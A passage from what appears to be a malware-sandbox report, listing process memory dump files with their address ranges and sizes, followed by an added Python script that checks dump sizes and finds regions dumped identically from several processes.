                                                                                                                                                                                                                                                                • memory/4312-119-0x0000000000370000-0x00000000003C2000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  328KB

                                                                                                                                                                                                                                                                • memory/4312-154-0x0000000005850000-0x00000000058C6000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                • memory/4312-120-0x0000000005220000-0x00000000057C6000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  5.6MB

                                                                                                                                                                                                                                                                • memory/4312-166-0x0000000006550000-0x000000000659C000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                                • memory/4312-135-0x0000000004EE0000-0x0000000004EEA000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                • memory/4436-80-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-78-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-219-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-74-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-73-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-75-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-76-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-77-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-81-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4436-79-0x0000000000180000-0x000000000080E000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.6MB

                                                                                                                                                                                                                                                                • memory/4464-516-0x0000000003FC0000-0x0000000004207000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2.3MB

                                                                                                                                                                                                                                                                • memory/4464-515-0x0000000003FC0000-0x0000000004207000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2.3MB

                                                                                                                                                                                                                                                                • memory/4464-514-0x0000000003FC0000-0x0000000004207000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2.3MB

                                                                                                                                                                                                                                                                • memory/4464-513-0x0000000003FC0000-0x0000000004207000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2.3MB

                                                                                                                                                                                                                                                                • memory/4464-517-0x0000000003FC0000-0x0000000004207000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2.3MB

                                                                                                                                                                                                                                                                • memory/4488-889-0x0000000005EA0000-0x0000000005EEC000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                                • memory/4580-864-0x0000000005E20000-0x0000000006177000-memory.dmp

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  3.3MB

• memory/4580-966-0x000000006E180000-0x000000006E4D7000-memory.dmp (Filesize 3.3MB)
• memory/4580-901-0x00000000071C0000-0x0000000007206000-memory.dmp (Filesize 280KB)
• memory/4580-965-0x000000006F0C0000-0x000000006F10C000-memory.dmp (Filesize 304KB)
• memory/4632-451-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4632-53-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4632-212-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4632-503-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4632-501-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4632-511-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4632-342-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4632-499-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/4816-157-0x0000000000E50000-0x0000000000E51000-memory.dmp (Filesize 4KB)
• memory/4816-155-0x0000000000E50000-0x0000000000E51000-memory.dmp (Filesize 4KB)
• memory/4952-397-0x0000000000400000-0x0000000000458000-memory.dmp (Filesize 352KB)
• memory/4952-398-0x0000000000400000-0x0000000000458000-memory.dmp (Filesize 352KB)
• memory/4996-97-0x0000000000400000-0x0000000000592000-memory.dmp (Filesize 1.6MB)
• memory/5052-494-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/5052-491-0x0000000000910000-0x0000000000DBC000-memory.dmp (Filesize 4.7MB)
• memory/5068-498-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-218-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-344-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-510-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-19-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-20-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-21-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-220-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-16-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-71-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-334-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-502-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-450-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5068-213-0x0000000000320000-0x00000000007DC000-memory.dmp (Filesize 4.7MB)
• memory/5088-799-0x00000000000D0000-0x000000000073E000-memory.dmp (Filesize 6.4MB)
• memory/5188-999-0x00000000000D0000-0x000000000073E000-memory.dmp (Filesize 6.4MB)
• memory/5544-979-0x0000000000D30000-0x000000000139E000-memory.dmp (Filesize 6.4MB)
• memory/5660-992-0x00000208D0110000-0x00000208D3944000-memory.dmp (Filesize 56.2MB)
• memory/5660-1002-0x00000208EE020000-0x00000208EE02C000-memory.dmp (Filesize 48KB)
• memory/5660-1000-0x00000208EE1D0000-0x00000208EE2DA000-memory.dmp (Filesize 1.0MB)
• memory/5660-1001-0x00000208EE000000-0x00000208EE010000-memory.dmp (Filesize 64KB)
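The dump names above encode the PID, a sequence number and the start/end virtual address of each region. Before pulling individual dumps for analysis it is worth sanity-checking the list programmatically: confirm that each reported Filesize matches the address span, collapse the many repeated dumps of one region per process, and find regions that are dumped at exactly the same address span from different PIDs, which in this report happens for 4632/5052 (0x910000-0xDBC000) and 5088/5188 (0xD0000-0x73E000) and usually means the same image was started or written more than once. The script below is an added example, not part of the sandbox report or its tooling; the sample list is a constructed subset copied from the entries above, and the size-rounding rule (whole KB below 1 MiB, one decimal MB above) is an assumption inferred from the report's own values.

```python
import re
from collections import defaultdict

# Constructed sample: (dump name, reported Filesize) pairs copied from the
# report's memory section. Not every repeat of a region is included.
DUMPS = [
    ("memory/4580-966-0x000000006E180000-0x000000006E4D7000-memory.dmp", "3.3MB"),
    ("memory/4580-901-0x00000000071C0000-0x0000000007206000-memory.dmp", "280KB"),
    ("memory/4580-965-0x000000006F0C0000-0x000000006F10C000-memory.dmp", "304KB"),
    ("memory/4632-451-0x0000000000910000-0x0000000000DBC000-memory.dmp", "4.7MB"),
    ("memory/4632-53-0x0000000000910000-0x0000000000DBC000-memory.dmp", "4.7MB"),
    ("memory/4816-157-0x0000000000E50000-0x0000000000E51000-memory.dmp", "4KB"),
    ("memory/4952-397-0x0000000000400000-0x0000000000458000-memory.dmp", "352KB"),
    ("memory/4996-97-0x0000000000400000-0x0000000000592000-memory.dmp", "1.6MB"),
    ("memory/5052-494-0x0000000000910000-0x0000000000DBC000-memory.dmp", "4.7MB"),
    ("memory/5068-498-0x0000000000320000-0x00000000007DC000-memory.dmp", "4.7MB"),
    ("memory/5068-19-0x0000000000320000-0x00000000007DC000-memory.dmp", "4.7MB"),
    ("memory/5088-799-0x00000000000D0000-0x000000000073E000-memory.dmp", "6.4MB"),
    ("memory/5188-999-0x00000000000D0000-0x000000000073E000-memory.dmp", "6.4MB"),
    ("memory/5544-979-0x0000000000D30000-0x000000000139E000-memory.dmp", "6.4MB"),
    ("memory/5660-992-0x00000208D0110000-0x00000208D3944000-memory.dmp", "56.2MB"),
    ("memory/5660-1002-0x00000208EE020000-0x00000208EE02C000-memory.dmp", "48KB"),
    ("memory/5660-1000-0x00000208EE1D0000-0x00000208EE2DA000-memory.dmp", "1.0MB"),
    ("memory/5660-1001-0x00000208EE000000-0x00000208EE010000-memory.dmp", "64KB"),
]

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
PATTERN = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_dump_name(name):
    """Split a dump file name into pid, sequence number and address span."""
    m = PATTERN.match(name)
    if not m:
        raise ValueError(f"unexpected dump name: {name}")
    pid, seq, start, end = m.groups()
    return {"pid": int(pid), "seq": int(seq), "start": int(start, 16), "end": int(end, 16)}


def human_size(nbytes):
    """Assumed rounding rule matching the report: KB below 1 MiB, else MB with one decimal."""
    if nbytes < 1024 * 1024:
        return f"{nbytes // 1024}KB"
    return f"{nbytes / (1024 * 1024):.1f}MB"


def check_sizes(entries):
    """Return entries whose reported size does not match end - start."""
    mismatches = []
    for name, reported in entries:
        d = parse_dump_name(name)
        computed = human_size(d["end"] - d["start"])
        if computed != reported:
            mismatches.append((name, reported, computed))
    return mismatches


def regions_by_pid(entries):
    """Collapse repeated dumps: pid -> sorted list of distinct (start, end) spans."""
    spans = defaultdict(set)
    for name, _ in entries:
        d = parse_dump_name(name)
        spans[d["pid"]].add((d["start"], d["end"]))
    return {pid: sorted(s) for pid, s in spans.items()}


def shared_regions(entries):
    """(start, end) -> sorted PIDs, for spans dumped identically from more than one process."""
    pids = defaultdict(set)
    for name, _ in entries:
        d = parse_dump_name(name)
        pids[(d["start"], d["end"])].add(d["pid"])
    return {span: sorted(p) for span, p in pids.items() if len(p) > 1}


if __name__ == "__main__":
    print("size mismatches:", check_sizes(DUMPS))
    for pid, spans in sorted(regions_by_pid(DUMPS).items()):
        print(pid, [f"0x{s:X}-0x{e:X}" for s, e in spans])
    for (s, e), p in shared_regions(DUMPS).items():
        print(f"0x{s:X}-0x{e:X} dumped from PIDs {p}")
```

Matching spans across PIDs are only a hint, not proof that the bytes are identical; compare the dumps themselves (hash, or diff the PE headers) before treating them as one payload. A genuine Filesize mismatch would indicate a truncated or mislabeled dump and the region should be re-extracted rather than analysed as-is.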
